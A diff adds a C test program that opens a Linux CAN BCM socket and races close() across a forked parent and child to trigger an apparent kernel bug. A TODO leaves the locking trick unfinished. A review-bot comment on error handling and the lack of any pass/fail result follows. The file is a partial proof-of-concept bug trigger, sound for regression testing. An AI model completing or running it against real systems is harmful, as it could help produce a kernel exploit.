-rw-r--r-- | bcm_test.c | 45 |
1 files changed, 45 insertions, 0 deletions
diff --git a/bcm_test.c b/bcm_test.c
new file mode 100644
index 0000000..c0b72d9
--- /dev/null
+++ b/bcm_test.c
@@ -0,0 +1,45 @@
+#include <stdio.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/ioctl.h>
+#include <net/if.h>
+#include <linux/can.h>
+#include <linux/can/raw.h>
+
+#ifndef PF_CAN
+#define PF_CAN 29
+#endif
+
+#ifndef CAN_BCM
+#define CAN_BCM 2
+#endif
+
+int main()
+{
+ printf("[+] Creating BCM CAN socket.\n");
+ int sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM);
+ if (sock < 0) {
+ printf("[-] No BCM CAN support.\n");
+ return -1;
+ }
+
+ printf("[+] Connecting to socket.\n");
+ struct sockaddr_can addr;
+ memset(&addr, 0, sizeof(addr));
+ addr.can_family = PF_CAN;
+ connect(sock, (struct sockaddr *)&addr, sizeof(addr));
+
+ printf("[+] Triggering the bug.\n");
+ if (fork()) {
+ //TODO: Somehow jam the locking mechanism so release_sock hangs.
+ close(sock);
+ } else {
+ sleep(2);
+ close(sock);
+ _exit(0);
+ }
+ sleep(5);
+
+ return 0;
+} |
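Review bot: `connect()` and `fork()` in `main` are called without checking their results, so a failed connect still prints "Triggering the bug" and a failed fork (-1) is silently treated as the parent branch. The file also uses `fork`, `close`, `sleep` and `_exit` without `#include <unistd.h>`, leaving them implicitly declared, and `int main(void)` would be the correct prototype. The parent relies on a fixed `sleep(5)` instead of reaping the child; `waitpid()` (with `<sys/wait.h>`) would make the ordering explicit. As written the program returns 0 on every path after socket creation and the TODO is still open, so as a regression check for a patched kernel it gives no pass/fail signal.

```c
	printf("[+] Connecting to socket.\n");
	/* … unchanged: addr declaration and setup … */
	if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
		perror("connect");
		close(sock);
		return 1;
	}

	printf("[+] Triggering the bug.\n");
	pid_t pid = fork();
	if (pid < 0) {
		perror("fork");
		close(sock);
		return 1;
	}
	if (pid > 0) {
		/* … unchanged: parent branch … */
	} else {
		/* … unchanged: child branch … */
	}
	/* reap the child instead of sleeping a fixed interval */
	waitpid(pid, NULL, 0);
```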